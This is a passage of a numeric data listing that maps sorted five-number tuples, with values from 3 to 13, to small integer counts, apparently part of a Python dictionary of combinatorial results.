(3, 4, 4, 7, 9): 10,
(3, 4, 4, 7, 10): 16,
(3, 4, 4, 7, 11): 12,
(3, 4, 4, 7, 12): 9,
(3, 4, 4, 7, 13): 8,
(3, 4, 4, 8, 8): 6,
(3, 4, 4, 8, 9): 10,
(3, 4, 4, 8, 10): 14,
(3, 4, 4, 8, 11): 6,
(3, 4, 4, 8, 12): 9,
(3, 4, 4, 8, 13): 8,
(3, 4, 4, 9, 9): 5,
(3, 4, 4, 9, 10): 14,
(3, 4, 4, 9, 11): 6,
(3, 4, 4, 9, 12): 11,
(3, 4, 4, 9, 13): 8,
(3, 4, 4, 10, 10): 7,
(3, 4, 4, 10, 11): 14,
(3, 4, 4, 10, 12): 17,
(3, 4, 4, 10, 13): 6,
(3, 4, 4, 11, 11): 6,
(3, 4, 4, 11, 12): 8,
(3, 4, 4, 11, 13): 10,
(3, 4, 4, 12, 12): 4,
(3, 4, 4, 12, 13): 7,
(3, 4, 4, 13, 13): 6,
(3, 4, 5, 5, 5): 6,
(3, 4, 5, 5, 6): 17,
(3, 4, 5, 5, 7): 12,
(3, 4, 5, 5, 8): 10,
(3, 4, 5, 5, 9): 12,
(3, 4, 5, 5, 10): 12,
(3, 4, 5, 5, 11): 10,
(3, 4, 5, 5, 12): 9,
(3, 4, 5, 5, 13): 11,
(3, 4, 5, 6, 6): 23,
(3, 4, 5, 6, 7): 21,
(3, 4, 5, 6, 8): 23,
(3, 4, 5, 6, 9): 22,
(3, 4, 5, 6, 10): 25,
(3, 4, 5, 6, 11): 26,
(3, 4, 5, 6, 12): 37,
(3, 4, 5, 6, 13): 21,
(3, 4, 5, 7, 7): 17,
(3, 4, 5, 7, 8): 21,
(3, 4, 5, 7, 9): 19,
(3, 4, 5, 7, 10): 20,
(3, 4, 5, 7, 11): 18,
(3, 4, 5, 7, 12): 30,
(3, 4, 5, 7, 13): 12,
(3, 4, 5, 8, 8): 5,
(3, 4, 5, 8, 9): 17,
(3, 4, 5, 8, 10): 29,
(3, 4, 5, 8, 11): 20,
(3, 4, 5, 8, 12): 12,
(3, 4, 5, 8, 13): 20,
(3, 4, 5, 9, 9): 14,
(3, 4, 5, 9, 10): 22,
(3, 4, 5, 9, 11): 16,
(3, 4, 5, 9, 12): 20,
(3, 4, 5, 9, 13): 19,
(3, 4, 5, 10, 10): 7,
(3, 4, 5, 10, 11): 19,
(3, 4, 5, 10, 12): 19,
(3, 4, 5, 10, 13): 16,
(3, 4, 5, 11, 11): 9,
(3, 4, 5, 11, 12): 14,
(3, 4, 5, 11, 13): 11,
(3, 4, 5, 12, 12): 15,
(3, 4, 5, 12, 13): 19,
(3, 4, 5, 13, 13): 3,
(3, 4, 6, 6, 6): 16,
(3, 4, 6, 6, 7): 22,
(3, 4, 6, 6, 8): 26,
(3, 4, 6, 6, 9): 29,
(3, 4, 6, 6, 10): 18,
(3, 4, 6, 6, 11): 16,
(3, 4, 6, 6, 12): 26,
(3, 4, 6, 6, 13): 17,
(3, 4, 6, 7, 7): 17,
(3, 4, 6, 7, 8): 33,
(3, 4, 6, 7, 9): 30,
(3, 4, 6, 7, 10): 15,
(3, 4, 6, 7, 11): 19,
(3, 4, 6, 7, 12): 36,
(3, 4, 6, 7, 13): 25,
(3, 4, 6, 8, 8): 20,
(3, 4, 6, 8, 9): 33,
(3, 4, 6, 8, 10): 23,
(3, 4, 6, 8, 11): 20,
(3, 4, 6, 8, 12): 61,
(3, 4, 6, 8, 13): 27,
(3, 4, 6, 9, 9): 19,
(3, 4, 6, 9, 10): 30,
(3, 4, 6, 9, 11): 21,
(3, 4, 6, 9, 12): 50,
(3, 4, 6, 9, 13): 15,
(3, 4, 6, 10, 10): 16,
(3, 4, 6, 10, 11): 17,
(3, 4, 6, 10, 12): 26,
(3, 4, 6, 10, 13): 10,
(3, 4, 6, 11, 11): 6,
(3, 4, 6, 11, 12): 25,
(3, 4, 6, 11, 13): 15,
(3, 4, 6, 12, 12): 31,
(3, 4, 6, 12, 13): 30,
(3, 4, 6, 13, 13): 7,
(3, 4, 7, 7, 7): 10,
(3, 4, 7, 7, 8): 12,
(3, 4, 7, 7, 9): 12,
(3, 4, 7, 7, 10): 13,
(3, 4, 7, 7, 11): 11,
(3, 4, 7, 7, 12): 12,
(3, 4, 7, 7, 13): 12,
(3, 4, 7, 8, 8): 8,
(3, 4, 7, 8, 9): 19,
(3, 4, 7, 8, 10): 26,
(3, 4, 7, 8, 11): 20,
(3, 4, 7, 8, 12): 11,
(3, 4, 7, 8, 13): 14,
(3, 4, 7, 9, 9): 14,
(3, 4, 7, 9, 10): 20,
(3, 4, 7, 9, 11): 19,
(3, 4, 7, 9, 12): 21,
(3, 4, 7, 9, 13): 18,
(3, 4, 7, 10, 10): 7,
(3, 4, 7, 10, 11): 17,
(3, 4, 7, 10, 12): 29,
(3, 4, 7, 10, 13): 13,
(3, 4, 7, 11, 11): 8,
(3, 4, 7, 11, 12): 15,
(3, 4, 7, 11, 13): 11,
(3, 4, 7, 12, 12): 8,
(3, 4, 7, 12, 13): 13,
(3, 4, 7, 13, 13): 7,
(3, 4, 8, 8, 8): 4,
(3, 4, 8, 8, 9): 5,
(3, 4, 8, 8, 10): 17,
(3, 4, 8, 8, 11): 4,
(3, 4, 8, 8, 12): 7,
(3, 4, 8, 8, 13): 5,
(3, 4, 8, 9, 9): 13,
(3, 4, 8, 9, 10): 16,
(3, 4, 8, 9, 11): 12,
(3, 4, 8, 9, 12): 22,
(3, 4, 8, 9, 13): 14,
(3, 4, 8, 10, 10): 10,
(3, 4, 8, 10, 11): 15,
(3, 4, 8, 10, 12): 30,
(3, 4, 8, 10, 13): 19,
(3, 4, 8, 11, 11): 11,
(3, 4, 8, 11, 12): 10,
(3, 4, 8, 11, 13): 16,
(3, 4, 8, 12, 12): 17,
(3, 4, 8, 12, 13): 6,
(3, 4, 8, 13, 13): 4,
(3, 4, 9, 9, 9): 12,
(3, 4, 9, 9, 10): 10,
(3, 4, 9, 9, 11): 17,
(3, 4, 9, 9, 12): 16,
(3, 4, 9, 9, 13): 5,
(3, 4, 9, 10, 10): 9,
(3, 4, 9, 10, 11): 16,
(3, 4, 9, 10, 12): 35,
(3, 4, 9, 10, 13): 9,
(3, 4, 9, 11, 11): 6,
(3, 4, 9, 11, 12): 21,
(3, 4, 9, 11, 13): 9,
(3, 4, 9, 12, 12): 11,
(3, 4, 9, 12, 13): 18,
(3, 4, 9, 13, 13): 13,
(3, 4, 10, 10, 10): 4,
(3, 4, 10, 10, 11): 9,
(3, 4, 10, 10, 12): 4,
(3, 4, 10, 10, 13): 8,
(3, 4, 10, 11, 11): 6,
(3, 4, 10, 11, 12): 11,
(3, 4, 10, 11, 13): 11,
(3, 4, 10, 12, 12): 25,
(3, 4, 10, 12, 13): 13,
(3, 4, 10, 13, 13): 7,
(3, 4, 11, 11, 11): 4,
(3, 4, 11, 11, 12): 4,
(3, 4, 11, 11, 13): 7,
(3, 4, 11, 12, 12): 8,
(3, 4, 11, 12, 13): 14,
(3, 4, 11, 13, 13): 7,
(3, 4, 12, 12, 12): 3,
(3, 4, 12, 12, 13): 5,
(3, 4, 12, 13, 13): 7,
(3, 4, 13, 13, 13): 4,
(3, 5, 5, 5, 5): 1,
(3, 5, 5, 5, 6): 3,
(3, 5, 5, 5, 7): 5,
(3, 5, 5, 5, 8): 5,
(3, 5, 5, 5, 9): 5,
(3, 5, 5, 5, 10): 4,
(3, 5, 5, 5, 11): 5,
(3, 5, 5, 5, 12): 3,
(3, 5, 5, 5, 13): 2,
(3, 5, 5, 6, 6): 6,
(3, 5, 5, 6, 7): 8,
(3, 5, 5, 6, 8): 10,
(3, 5, 5, 6, 9): 24,
(3, 5, 5, 6, 10): 9,
(3, 5, 5, 6, 11): 11,
(3, 5, 5, 6, 12): 9,
(3, 5, 5, 6, 13): 8,
(3, 5, 5, 7, 7): 8,
(3, 5, 5, 7, 8): 12,
(3, 5, 5, 7, 9): 9,
(3, 5, 5, 7, 10): 10,
(3, 5, 5, 7, 11): 6,
(3, 5, 5, 7, 12): 8,
(3, 5, 5, 7, 13): 9,
(3, 5, 5, 8, 8): 8,
(3, 5, 5, 8, 9): 9,
(3, 5, 5, 8, 10): 6,
(3, 5, 5, 8, 11): 3,
(3, 5, 5, 8, 12): 13,
(3, 5, 5, 8, 13): 5,
(3, 5, 5, 9, 9): 1,
(3, 5, 5, 9, 10): 8,
(3, 5, 5, 9, 11): 10,
(3, 5, 5, 9, 12): 13,
(3, 5, 5, 9, 13): 8,
(3, 5, 5, 10, 10): 4,
(3, 5, 5, 10, 11): 15,
(3, 5, 5, 10, 12): 13,
(3, 5, 5, 10, 13): 9,
(3, 5, 5, 11, 11): 3,
(3, 5, 5, 11, 12): 3,
(3, 5, 5, 11, 13): 4,
(3, 5, 5, 12, 12): 4,
(3, 5, 5, 12, 13): 6,
(3, 5, 5, 13, 13): 6,
(3, 5, 6, 6, 6): 7,
(3, 5, 6, 6, 7): 9,
(3, 5, 6, 6, 8): 20,
(3, 5, 6, 6, 9): 22,
(3, 5, 6, 6, 10): 25,
(3, 5, 6, 6, 11): 4,
(3, 5, 6, 6, 12): 20,
(3, 5, 6, 6, 13): 7,
(3, 5, 6, 7, 7): 14,
(3, 5, 6, 7, 8): 20,
(3, 5, 6, 7, 9): 30,
(3, 5, 6, 7, 10): 22,
(3, 5, 6, 7, 11): 13,
(3, 5, 6, 7, 12): 28,
(3, 5, 6, 7, 13): 22,
(3, 5, 6, 8, 8): 12,
(3, 5, 6, 8, 9): 19,
(3, 5, 6, 8, 10): 16,
(3, 5, 6, 8, 11): 20,
(3, 5, 6, 8, 12): 43,
(3, 5, 6, 8, 13): 20,
(3, 5, 6, 9, 9): 18,
(3, 5, 6, 9, 10): 21,
(3, 5, 6, 9, 11): 27,
(3, 5, 6, 9, 12): 33,
(3, 5, 6, 9, 13): 19,
(3, 5, 6, 10, 10): 14,
(3, 5, 6, 10, 11): 19,
(3, 5, 6, 10, 12): 24,
(3, 5, 6, 10, 13): 16,
(3, 5, 6, 11, 11): 9,
(3, 5, 6, 11, 12): 17,
(3, 5, 6, 11, 13): 11,
(3, 5, 6, 12, 12): 21,
(3, 5, 6, 12, 13): 14,
(3, 5, 6, 13, 13): 8,
(3, 5, 7, 7, 7): 5,
(3, 5, 7, 7, 8): 14,
(3, 5, 7, 7, 9): 14,
(3, 5, 7, 7, 10): 14,
(3, 5, 7, 7, 11): 10,
(3, 5, 7, 7, 12): 9,
(3, 5, 7, 7, 13): 6,
(3, 5, 7, 8, 8): 9,
(3, 5, 7, 8, 9): 11,
(3, 5, 7, 8, 10): 23,
(3, 5, 7, 8, 11): 14,
(3, 5, 7, 8, 12): 17,
(3, 5, 7, 8, 13): 13,
(3, 5, 7, 9, 9): 7,
(3, 5, 7, 9, 10): 17,
(3, 5, 7, 9, 11): 12,
(3, 5, 7, 9, 12): 34,
(3, 5, 7, 9, 13): 20,
(3, 5, 7, 10, 10): 13,
(3, 5, 7, 10, 11): 21,
(3, 5, 7, 10, 12): 23,
(3, 5, 7, 10, 13): 14,
(3, 5, 7, 11, 11): 4,
(3, 5, 7, 11, 12): 14,
(3, 5, 7, 11, 13): 9,
(3, 5, 7, 12, 12): 7,
(3, 5, 7, 12, 13): 9,
(3, 5, 7, 13, 13): 5,
(3, 5, 8, 8, 8): 3,
(3, 5, 8, 8, 9): 11,
(3, 5, 8, 8, 10): 14,
(3, 5, 8, 8, 11): 7,
(3, 5, 8, 8, 12): 2,
(3, 5, 8, 8, 13): 5,
(3, 5, 8, 9, 9): 12,
(3, 5, 8, 9, 10): 13,
(3, 5, 8, 9, 11): 10,
(3, 5, 8, 9, 12): 16,
(3, 5, 8, 9, 13): 16,
(3, 5, 8, 10, 10): 11,
(3, 5, 8, 10, 11): 12,
(3, 5, 8, 10, 12): 21,
(3, 5, 8, 10, 13): 17,
(3, 5, 8, 11, 11): 7,
(3, 5, 8, 11, 12): 18,
(3, 5, 8, 11, 13): 6,
(3, 5, 8, 12, 12): 6,
(3, 5, 8, 12, 13): 15,
(3, 5, 8, 13, 13): 12,
(3, 5, 9, 9, 9): 7,
(3, 5, 9, 9, 10): 18,
(3, 5, 9, 9, 11): 4,
(3, 5, 9, 9, 12): 17,
(3, 5, 9, 9, 13): 2,
(3, 5, 9, 10, 10): 8,
(3, 5, 9, 10, 11): 12,
(3, 5, 9, 10, 12): 14,
(3, 5, 9, 10, 13): 14,
(3, 5, 9, 11, 11): 9,
(3, 5, 9, 11, 12): 19,
(3, 5, 9, 11, 13): 10,
(3, 5, 9, 12, 12): 11,
(3, 5, 9, 12, 13): 16,
(3, 5, 9, 13, 13): 4,
(3, 5, 10, 10, 10): 5,
(3, 5, 10, 10, 11): 11,
(3, 5, 10, 10, 12): 9,
(3, 5, 10, 10, 13): 8,
(3, 5, 10, 11, 11): 10,
(3, 5, 10, 11, 12): 15,
(3, 5, 10, 11, 13): 15,
(3, 5, 10, 12, 12): 24,
(3, 5, 10, 12, 13): 17,
(3, 5, 10, 13, 13): 5,
(3, 5, 11, 11, 11): 1,
(3, 5, 11, 11, 12): 6,
(3, 5, 11, 11, 13): 5,
(3, 5, 11, 12, 12): 8,
(3, 5, 11, 12, 13): 5,
(3, 5, 11, 13, 13): 4,
(3, 5, 12, 12, 12): 1,
(3, 5, 12, 12, 13): 3,
(3, 5, 12, 13, 13): 2,
(3, 5, 13, 13, 13): 1,
(3, 6, 6, 6, 6): 3,
(3, 6, 6, 6, 7): 7,
(3, 6, 6, 6, 8): 9,
(3, 6, 6, 6, 9): 14,
(3, 6, 6, 6, 10): 9,
(3, 6, 6, 6, 11): 8,
(3, 6, 6, 6, 12): 20,
(3, 6, 6, 6, 13): 4,
(3, 6, 6, 7, 7): 2,
(3, 6, 6, 7, 8): 10,
(3, 6, 6, 7, 9): 11,
(3, 6, 6, 7, 10): 13,
(3, 6, 6, 7, 11): 10,
(3, 6, 6, 7, 12): 19,
(3, 6, 6, 7, 13): 8,
(3, 6, 6, 8, 8): 7,
(3, 6, 6, 8, 9): 14,
(3, 6, 6, 8, 10): 20,
(3, 6, 6, 8, 11): 14,
(3, 6, 6, 8, 12): 23,
(3, 6, 6, 8, 13): 10,
(3, 6, 6, 9, 9): 15,
(3, 6, 6, 9, 10): 19,
(3, 6, 6, 9, 11): 18,
(3, 6, 6, 9, 12): 32,
(3, 6, 6, 9, 13): 16,
(3, 6, 6, 10, 10): 8,
(3, 6, 6, 10, 11): 9,
(3, 6, 6, 10, 12): 22,
(3, 6, 6, 10, 13): 11,
(3, 6, 6, 11, 11): 3,
(3, 6, 6, 11, 12): 16,
(3, 6, 6, 11, 13): 7,
(3, 6, 6, 12, 12): 18,
(3, 6, 6, 12, 13): 16,
(3, 6, 6, 13, 13): 2,
(3, 6, 7, 7, 7): 6,
(3, 6, 7, 7, 8): 8,
(3, 6, 7, 7, 9): 22,
(3, 6, 7, 7, 10): 9,
(3, 6, 7, 7, 11): 16,
(3, 6, 7, 7, 12): 12,
(3, 6, 7, 7, 13): 7,
(3, 6, 7, 8, 8): 5,
(3, 6, 7, 8, 9): 20,
(3, 6, 7, 8, 10): 27,
(3, 6, 7, 8, 11): 16,
(3, 6, 7, 8, 12): 28,
(3, 6, 7, 8, 13): 13,
(3, 6, 7, 9, 9): 22,
(3, 6, 7, 9, 10): 15,
(3, 6, 7, 9, 11): 20,
(3, 6, 7, 9, 12): 30,
(3, 6, 7, 9, 13): 22,
(3, 6, 7, 10, 10): 6,
(3, 6, 7, 10, 11): 21,
(3, 6, 7, 10, 12): 23,
(3, 6, 7, 10, 13): 23,
(3, 6, 7, 11, 11): 8,
(3, 6, 7, 11, 12): 14,
(3, 6, 7, 11, 13): 16,
(3, 6, 7, 12, 12): 19,
(3, 6, 7, 12, 13): 9,
(3, 6, 7, 13, 13): 4,
(3, 6, 8, 8, 8): 3,
(3, 6, 8, 8, 9): 16,
(3, 6, 8, 8, 10): 15,
(3, 6, 8, 8, 11): 11,
(3, 6, 8, 8, 12): 13,
(3, 6, 8, 8, 13): 7,
(3, 6, 8, 9, 9): 22,
(3, 6, 8, 9, 10): 19,
(3, 6, 8, 9, 11): 11,
(3, 6, 8, 9, 12): 36,
(3, 6, 8, 9, 13): 12,
(3, 6, 8, 10, 10): 7,
(3, 6, 8, 10, 11): 10,
(3, 6, 8, 10, 12): 34,
(3, 6, 8, 10, 13): 25,
(3, 6, 8, 11, 11): 7,
(3, 6, 8, 11, 12): 21,
(3, 6, 8, 11, 13): 22,
(3, 6, 8, 12, 12): 26,
(3, 6, 8, 12, 13): 12,
(3, 6, 8, 13, 13): 4,
(3, 6, 9, 9, 9): 10,
(3, 6, 9, 9, 10): 13,
(3, 6, 9, 9, 11): 20,
(3, 6, 9, 9, 12): 21,
(3, 6, 9, 9, 13): 25,
(3, 6, 9, 10, 10): 13,
(3, 6, 9, 10, 11): 14,
(3, 6, 9, 10, 12): 19,
(3, 6, 9, 10, 13): 11,
(3, 6, 9, 11, 11): 11,
(3, 6, 9, 11, 12): 25,
(3, 6, 9, 11, 13): 13,
(3, 6, 9, 12, 12): 32,
(3, 6, 9, 12, 13): 25,
(3, 6, 9, 13, 13): 9,
(3, 6, 10, 10, 10): 2,
(3, 6, 10, 10, 11): 7,
(3, 6, 10, 10, 12): 14,
(3, 6, 10, 10, 13): 5,
(3, 6, 10, 11, 11): 8,
(3, 6, 10, 11, 12): 15,
(3, 6, 10, 11, 13): 12,
(3, 6, 10, 12, 12): 14,
(3, 6, 10, 12, 13): 19,
(3, 6, 10, 13, 13): 12,
(3, 6, 11, 11, 11): 4,
(3, 6, 11, 11, 12): 5,
(3, 6, 11, 11, 13): 6,
(3, 6, 11, 12, 12): 14,
(3, 6, 11, 12, 13): 12,
(3, 6, 11, 13, 13): 8,
(3, 6, 12, 12, 12): 12,
(3, 6, 12, 12, 13): 11,
(3, 6, 12, 13, 13): 6,
(3, 6, 13, 13, 13): 4,
(3, 7, 7, 7, 7): 3,
(3, 7, 7, 7, 8): 6,
(3, 7, 7, 7, 9): 3,
(3, 7, 7, 7, 10): 7,
(3, 7, 7, 7, 11): 5,
(3, 7, 7, 7, 12): 10,
(3, 7, 7, 7, 13): 2,
(3, 7, 7, 8, 8): 3,
(3, 7, 7, 8, 9): 6,
(3, 7, 7, 8, 10): 10,
(3, 7, 7, 8, 11): 12,
(3, 7, 7, 8, 12): 10,
(3, 7, 7, 8, 13): 6,
(3, 7, 7, 9, 9): 7,
(3, 7, 7, 9, 10): 9,
(3, 7, 7, 9, 11): 10,
(3, 7, 7, 9, 12): 15,
(3, 7, 7, 9, 13): 6,
(3, 7, 7, 10, 10): 2,
(3, 7, 7, 10, 11): 7,
(3, 7, 7, 10, 12): 9,
(3, 7, 7, 10, 13): 8,
(3, 7, 7, 11, 11): 3,
(3, 7, 7, 11, 12): 7,
(3, 7, 7, 11, 13): 9,
(3, 7, 7, 12, 12): 4,
(3, 7, 7, 12, 13): 6,
(3, 7, 7, 13, 13): 1,
(3, 7, 8, 8, 8): 3,
(3, 7, 8, 8, 9): 4,
(3, 7, 8, 8, 10): 7,
(3, 7, 8, 8, 11): 7,
(3, 7, 8, 8, 12): 6,
(3, 7, 8, 8, 13): 6,
(3, 7, 8, 9, 9): 13,
(3, 7, 8, 9, 10): 18,
(3, 7, 8, 9, 11): 9,
(3, 7, 8, 9, 12): 16,
(3, 7, 8, 9, 13): 11,
(3, 7, 8, 10, 10): 6,
(3, 7, 8, 10, 11): 11,
(3, 7, 8, 10, 12): 11,
(3, 7, 8, 10, 13): 9,
(3, 7, 8, 11, 11): 3,
(3, 7, 8, 11, 12): 15,
(3, 7, 8, 11, 13): 11,
(3, 7, 8, 12, 12): 11,
(3, 7, 8, 12, 13): 14,
(3, 7, 8, 13, 13): 7,
(3, 7, 9, 9, 9): 6,
(3, 7, 9, 9, 10): 11,
(3, 7, 9, 9, 11): 5,
(3, 7, 9, 9, 12): 11,
(3, 7, 9, 9, 13): 5,
(3, 7, 9, 10, 10): 4,
(3, 7, 9, 10, 11): 11,
(3, 7, 9, 10, 12): 20,
(3, 7, 9, 10, 13): 14,
(3, 7, 9, 11, 11): 6,
(3, 7, 9, 11, 12): 24,
(3, 7, 9, 11, 13): 12,
(3, 7, 9, 12, 12): 11,
(3, 7, 9, 12, 13): 13,
(3, 7, 9, 13, 13): 6,
(3, 7, 10, 10, 10): 3,
(3, 7, 10, 10, 11): 5,
(3, 7, 10, 10, 12): 6,
(3, 7, 10, 10, 13): 2,
(3, 7, 10, 11, 11): 6,
(3, 7, 10, 11, 12): 14,
(3, 7, 10, 11, 13): 10,
(3, 7, 10, 12, 12): 11,
(3, 7, 10, 12, 13): 14,
(3, 7, 10, 13, 13): 5,
(3, 7, 11, 11, 11): 1,
(3, 7, 11, 11, 12): 5,
(3, 7, 11, 11, 13): 4,
(3, 7, 11, 12, 12): 4,
(3, 7, 11, 12, 13): 8,
(3, 7, 11, 13, 13): 2,
(3, 7, 12, 12, 12): 3,
(3, 7, 12, 12, 13): 9,
(3, 7, 12, 13, 13): 6,
(3, 7, 13, 13, 13): 1,
(3, 8, 8, 8, 9): 1,
(3, 8, 8, 8, 10): 4,
(3, 8, 8, 8, 11): 2,
(3, 8, 8, 8, 12): 2,
(3, 8, 8, 8, 13): 2,
(3, 8, 8, 9, 9): 2,
(3, 8, 8, 9, 10): 11,
(3, 8, 8, 9, 11): 8,
(3, 8, 8, 9, 12): 5,
(3, 8, 8, 9, 13): 2,
(3, 8, 8, 10, 10): 5,
(3, 8, 8, 10, 11): 9,
(3, 8, 8, 10, 12): 12,
(3, 8, 8, 10, 13): 6,
(3, 8, 8, 11, 11): 1,
(3, 8, 8, 11, 12): 3,
(3, 8, 8, 11, 13): 3,
(3, 8, 8, 12, 12): 7,
(3, 8, 8, 12, 13): 4,
(3, 8, 8, 13, 13): 8,
(3, 8, 9, 9, 9): 3,
(3, 8, 9, 9, 10): 8,
(3, 8, 9, 9, 11): 5,
(3, 8, 9, 9, 12): 16,
(3, 8, 9, 9, 13): 8,
(3, 8, 9, 10, 10): 7,
(3, 8, 9, 10, 11): 11,
(3, 8, 9, 10, 12): 23,
(3, 8, 9, 10, 13): 12,
(3, 8, 9, 11, 11): 11,
(3, 8, 9, 11, 12): 9,
(3, 8, 9, 11, 13): 12,
(3, 8, 9, 12, 12): 9,
(3, 8, 9, 12, 13): 12,
(3, 8, 9, 13, 13): 3,
(3, 8, 10, 10, 10): 3,
(3, 8, 10, 10, 11): 5,
(3, 8, 10, 10, 12): 11,
(3, 8, 10, 10, 13): 4,
(3, 8, 10, 11, 11): 2,
(3, 8, 10, 11, 12): 14,
(3, 8, 10, 11, 13): 15,
(3, 8, 10, 12, 12): 12,
(3, 8, 10, 12, 13): 8,
(3, 8, 10, 13, 13): 3,
(3, 8, 11, 11, 11): 2,
(3, 8, 11, 11, 12): 3,
(3, 8, 11, 11, 13): 8,
(3, 8, 11, 12, 12): 5,
(3, 8, 11, 12, 13): 9,
(3, 8, 11, 13, 13): 7,
(3, 8, 12, 12, 12): 3,
(3, 8, 12, 12, 13): 7,
(3, 8, 12, 13, 13): 4,
(3, 8, 13, 13, 13): 1,
(3, 9, 9, 9, 10): 5,
(3, 9, 9, 9, 11): 6,
(3, 9, 9, 9, 12): 12,
(3, 9, 9, 9, 13): 7,
(3, 9, 9, 10, 10): 2,
(3, 9, 9, 10, 11): 13,
(3, 9, 9, 10, 12): 11,
(3, 9, 9, 10, 13): 5,
(3, 9, 9, 11, 11): 1,
(3, 9, 9, 11, 12): 11,
(3, 9, 9, 11, 13): 5,
(3, 9, 9, 12, 12): 9,
(3, 9, 9, 12, 13): 9,
(3, 9, 9, 13, 13): 3,
(3, 9, 10, 10, 10): 3,
(3, 9, 10, 10, 11): 5,
(3, 9, 10, 10, 12): 9,
(3, 9, 10, 10, 13): 7,
(3, 9, 10, 11, 11): 4,
(3, 9, 10, 11, 12): 11,
(3, 9, 10, 11, 13): 11,
(3, 9, 10, 12, 12): 14,
(3, 9, 10, 12, 13): 10,
(3, 9, 10, 13, 13): 9,
(3, 9, 11, 11, 11): 2,
(3, 9, 11, 11, 12): 9,
(3, 9, 11, 11, 13): 4,
(3, 9, 11, 12, 12): 10,
(3, 9, 11, 12, 13): 16,
(3, 9, 11, 13, 13): 5,
(3, 9, 12, 12, 12): 4,
(3, 9, 12, 12, 13): 6,
(3, 9, 12, 13, 13): 11,
(3, 9, 13, 13, 13): 3,
(3, 10, 10, 10, 11): 3,
(3, 10, 10, 10, 12): 4,
(3, 10, 10, 10, 13): 3,
(3, 10, 10, 11, 11): 4,
(3, 10, 10, 11, 12): 2,
(3, 10, 10, 11, 13): 2,
(3, 10, 10, 12, 12): 3,
(3, 10, 10, 12, 13): 4,
(3, 10, 10, 13, 13): 2,
(3, 10, 11, 11, 11): 3,
(3, 10, 11, 11, 12): 3,
(3, 10, 11, 11, 13): 4,
(3, 10, 11, 12, 12): 12,
(3, 10, 11, 12, 13): 11,
(3, 10, 11, 13, 13): 6,
(3, 10, 12, 12, 12): 7,
(3, 10, 12, 12, 13): 7,
(3, 10, 12, 13, 13): 6,
(3, 10, 13, 13, 13): 4,
(3, 11, 11, 11, 12): 5,
(3, 11, 11, 11, 13): 3,
(3, 11, 11, 12, 12): 2,
(3, 11, 11, 12, 13): 2,
(3, 11, 11, 13, 13): 2,
(3, 11, 12, 12, 12): 1,
(3, 11, 12, 12, 13): 6,
(3, 11, 12, 13, 13): 3,
(3, 11, 13, 13, 13): 1,
(3, 12, 12, 12, 12): 2,
(3, 12, 12, 12, 13): 1,
(3, 12, 12, 13, 13): 1,
(3, 12, 13, 13, 13): 2,
(3, 13, 13, 13, 13): 1,
(4, 4, 4, 4, 5): 1,
(4, 4, 4, 4, 6): 4,
(4, 4, 4, 4, 7): 1,
(4, 4, 4, 4, 10): 4,
(4, 4, 4, 4, 11): 2,
(4, 4, 4, 4, 12): 1,
(4, 4, 4, 5, 5): 1,
(4, 4, 4, 5, 6): 10,
(4, 4, 4, 5, 7): 1,
(4, 4, 4, 5, 8): 4,
(4, 4, 4, 5, 9): 3,
(4, 4, 4, 5, 10): 5,
(4, 4, 4, 5, 11): 1,
(4, 4, 4, 5, 12): 2,
(4, 4, 4, 6, 6): 2,
(4, 4, 4, 6, 7): 10,
(4, 4, 4, 6, 8): 7,
(4, 4, 4, 6, 9): 6,
(4, 4, 4, 6, 10): 9,
(4, 4, 4, 6, 11): 4,
(4, 4, 4, 6, 12): 8,
(4, 4, 4, 6, 13): 7,
(4, 4, 4, 7, 7): 3,
(4, 4, 4, 7, 8): 7,
(4, 4, 4, 7, 9): 2,
(4, 4, 4, 7, 10): 4,
(4, 4, 4, 7, 11): 2,
(4, 4, 4, 7, 12): 3,
(4, 4, 4, 7, 13): 2,
(4, 4, 4, 8, 8): 1,
(4, 4, 4, 8, 9): 4,
(4, 4, 4, 8, 10): 13,
(4, 4, 4, 8, 11): 9,
(4, 4, 4, 8, 12): 3,
(4, 4, 4, 8, 13): 4,
(4, 4, 4, 9, 10): 5,
(4, 4, 4, 9, 11): 1,
(4, 4, 4, 9, 12): 3,
(4, 4, 4, 9, 13): 3,
(4, 4, 4, 10, 10): 2,
(4, 4, 4, 10, 11): 5,
(4, 4, 4, 10, 12): 9,
(4, 4, 4, 10, 13): 3,
(4, 4, 4, 11, 11): 2,
(4, 4, 4, 11, 12): 2,
(4, 4, 4, 11, 13): 2,
(4, 4, 4, 12, 12): 2,
(4, 4, 4, 12, 13): 2,
(4, 4, 4, 13, 13): 2,
(4, 4, 5, 5, 5): 1,
(4, 4, 5, 5, 6): 4,
(4, 4, 5, 5, 7): 6,
(4, 4, 5, 5, 8): 5,
(4, 4, 5, 5, 9): 5,
(4, 4, 5, 5, 10): 5,
(4, 4, 5, 5, 11): 3,
(4, 4, 5, 5, 12): 7,
(4, 4, 5, 5, 13): 4,
(4, 4, 5, 6, 6): 5,
(4, 4, 5, 6, 7): 13,
(4, 4, 5, 6, 8): 25,
(4, 4, 5, 6, 9): 9,
(4, 4, 5, 6, 10): 10,
(4, 4, 5, 6, 11): 15,
(4, 4, 5, 6, 12): 18,
(4, 4, 5, 6, 13): 10,
(4, 4, 5, 7, 7): 5,
(4, 4, 5, 7, 8): 6,
(4, 4, 5, 7, 9): 10,
(4, 4, 5, 7, 10): 17,
(4, 4, 5, 7, 11): 7,
(4, 4, 5, 7, 12): 9,
(4, 4, 5, 7, 13): 9,
(4, 4, 5, 8, 8): 7,
(4, 4, 5, 8, 9): 5,
(4, 4, 5, 8, 10): 16,
(4, 4, 5, 8, 11): 6,
(4, 4, 5, 8, 12): 8,
(4, 4, 5, 8, 13): 4,
(4, 4, 5, 9, 9): 1,
(4, 4, 5, 9, 10): 9,
(4, 4, 5, 9, 11): 9,
(4, 4, 5, 9, 12): 5,
(4, 4, 5, 9, 13): 5,
(4, 4, 5, 10, 10): 9,
(4, 4, 5, 10, 11): 9,
(4, 4, 5, 10, 12): 20,
(4, 4, 5, 10, 13): 11,
(4, 4, 5, 11, 11): 3,
(4, 4, 5, 11, 12): 5,
(4, 4, 5, 11, 13): 8,
(4, 4, 5, 12, 12): 2,
(4, 4, 5, 12, 13): 5,
(4, 4, 5, 13, 13): 2,
(4, 4, 6, 6, 6): 5,
(4, 4, 6, 6, 7): 6,
(4, 4, 6, 6, 8): 10,
(4, 4, 6, 6, 9): 11,
(4, 4, 6, 6, 10): 8,
(4, 4, 6, 6, 11): 3,
(4, 4, 6, 6, 12): 14,
(4, 4, 6, 6, 13): 3,
(4, 4, 6, 7, 7): 11,
(4, 4, 6, 7, 8): 17,
(4, 4, 6, 7, 9): 8,
(4, 4, 6, 7, 10): 11,
(4, 4, 6, 7, 11): 6,
